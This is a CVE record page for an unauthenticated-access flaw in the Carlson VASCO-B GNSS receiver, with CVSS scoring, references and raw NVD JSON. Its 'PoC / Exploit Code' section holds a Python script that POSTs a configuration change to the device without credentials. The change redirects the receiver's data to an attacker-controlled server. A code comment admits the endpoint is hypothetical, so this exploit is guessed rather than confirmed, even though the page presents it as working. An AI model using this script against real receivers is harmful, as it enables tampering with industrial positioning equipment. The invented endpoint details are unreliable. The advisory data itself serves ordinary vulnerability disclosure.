CVE-2026-3893

Description

The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism, allowing an attacker with network access to directly access and modify its configuration and operational functions without needing credentials.

CVSS Details

CVSS Score

9.4

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Carlson VASCO-B GNSS Receiver (固件版本未明确，建议参考厂商公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration (Example IP address)
target_ip = "192.168.1.100"
# Hypothetical endpoint for configuration update based on vulnerability description
url = f"http://{target_ip}/api/config/update"

# Malicious payload to change device configuration
payload = {
    "network_setting": "dynamic",
    "server_ip": "192.168.1.200",  # Redirecting data to attacker-controlled server
    "operation_mode": "maintenance"
}

try:
    # Sending request without Authentication headers
    response = requests.post(url, data=payload, timeout=10)

    if response.status_code == 200:
        print("[+] Exploit Successful! Configuration modified without authentication.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")

except requests.exceptions.RequestException as e:
    print(f"[!] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-3893
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-3893
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-3893/
[4] VulDB https://vuldb.com/cve/CVE-2026-3893
[5] https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-113-02.json
[6] https://www.carlsonsw.com/support-and-training/
[7] https://www.cve.org/CVERecord?id=CVE-2026-3893

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-3893", "sourceIdentifier": "[email protected]", "published": "2026-04-28T19:37:39.647", "lastModified": "2026-04-28T20:10:23.367", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism, \nallowing an attacker with network access to directly access and modify \nits configuration and operational functions without needing credentials."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-113-02.json", "source": "[email protected]"}, {"url": "https://www.carlsonsw.com/support-and-training/", "source": "[email protected]"}, {"url": "https://www.cve.org/CVERecord?id=CVE-2026-3893", "source": "[email protected]"}]}}